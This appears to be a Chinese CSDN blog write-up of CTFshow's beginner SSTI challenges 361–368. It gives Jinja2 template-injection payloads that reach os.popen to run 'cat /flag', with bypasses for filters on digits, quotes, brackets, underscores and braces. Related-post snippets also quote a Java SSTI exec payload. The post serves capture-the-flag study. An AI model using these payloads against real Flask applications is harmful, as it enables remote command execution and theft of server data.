CTFSHOW-WEB入门-SSTI

最新推荐文章于 2024-07-15 13:13:49 发布
最新推荐文章于 2024-07-15 13:13:49 发布
阅读量340 收藏 5
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80337881/article/details/136769995
版权
文章讲述了在一系列网络安全挑战中,如何通过利用SSTI(Server-SideTemplateInjection)漏洞,逐步绕过过滤功能,如数字过滤、引号过滤、cookie利用等,最终获取flag的过程。
摘要由CSDN通过智能技术生成

361

这一关给的提示是名字就是考点,所以我们尝试?name={{2*2}}测试一下;发现

所以存在ssti漏洞,所以构造payload

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

__class__ 返回调用的参数类型

__bases__ 返回类型列表

__subclasses__() 返回object的子类

__globals__ 函数会以字典类型返回当前位置的全部全局变量

362 

这一关给的提示是开始过滤,那我们就要找过滤掉了什么,所以我们一个一个尝试,经过尝试发现过滤了2和3这两个数字。  我们可以使用全角数字绕过,把上一关的132变成132

 

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

363 

这一关过滤了单双引号,可以用request来绕过request.args 是flask中的一个属性,为返回请求的参数,这里把 来,进而绕过了引号的过滤 path 当作变量名,将后面的路径传值

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

364

这一关过滤了args ,改用cookie

GET:?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}
Cookie:a=os;b=popen;c=cat /flag

365

过滤了引号,还有中括号,但request.cookies仍然可以用。

GET:?name={{url_for.__globals__.os.popen(request.cookies.c).read()}}
Cookie:c=cat /flag

366 

在之前的基础上又ban了下划线_,这样globals这样的就构造不出来了,拿request绕过。 获取属性的话,用lipsum.(request.values.b)是会500的,中括号被ban了,getattribute也用不了的 话,就用falsk自带的过滤器attr

?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}

Cookie传参:
x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /f*').read()

367 

这一关过滤了os,但是上一关的payload也可以用,毕竟把os放到cookie里了。

368

这一关过滤了{},既然{{}}不给用,那么{% print()%}一样可以输出。

?name={%print((x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5))%}

上秋 7
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow-ssti
weixin_74660472的博客
04-18 336
ssti漏洞原理ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。morePython对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类。
CTFshow——SSTI
D.MIND 的博客
03-06 1906
首先一定要了解有关python类的知识: python __base__等内置方法 python inspect模块解析 # coding=utf-8_ _author__ = "leaves" class Base(object): a = 0 def __init__(self): self._a = 10 pass class Child(Base): "测试测试" _b = 10 def __str__(
网络安全最全ctfshow web入门 SSTI(1)
2401_84301853的博客
05-04 575
使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。payload。
ctfshow web入门 SSTI
2301_79442654的博客
03-16 192
返回一个包含Python中所有类的列表,这些类都是直接或间接从。选择了列表中的第133个元素(因为索引是从0开始的)。属性,可以获得一个字典,其中包含。类的基类列表,其中第一个元素是。命令,这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”
ctfshow——web入门——SSTI
m0_74013288的博客
11-12 308
GET输入?说明注入点是?name。
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
Server-Side Template Injection (SSTI) 是一种严重的网络安全漏洞,尤其在现代Web应用程序中,它可能导致远程代码执行(RCE)。2015年,James Kettle在黑帽大会上详细阐述了这种攻击方式,强调了它如何被误认为是跨...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。 同步更新于: 01月29日更新: 新收录文章 mysql MSSQL postgresql 前端安全 php java-Web redis SSTI 信息搜集 渗透 Web-...
ctfshow web入门 SSTI,2024年最新超通俗解析
2401_84164527的博客
04-09 625
— |返回一个包含Python中所有类的列表,这些类都是直接或间接从object继承的。4.选择了列表中的第133个元素(因为索引是从0开始的)。5.Popen通过访问Popen类的__init__方法的属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。6.popen从全局变量字典中获取名为popen的变量7.使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。8.调用read()方法来读取Popen对象的输出,即。
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
Jay17的博客
08-10 1361
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
ctfshow web入门(SSTI)
m0_62422842的博客
06-18 1341
ctfshow的web入门中ssti题目的总结
CTFshow-WEB入门-SSTI
feng的博客
02-21 4002
前言 开始SSTI,参考文章: flask之ssti模版注入从零到入门 SSTI模板注入绕过(进阶篇) 记录一下自己学习的东西: __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclass
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 3923
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
网络安全-基础网络概念1
LS_Ai的博客
07-11 530
计算机网络是一种将多个计算机系统和设备连接在一起的技术,目的是为了共享资源和信息。网络使得设备之间可以进行数据传输和通信,常见的网络包括局域网(LAN)、广域网(WAN)和城域网(MAN)。
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
最新发布
等风来
07-15 23
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 220
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值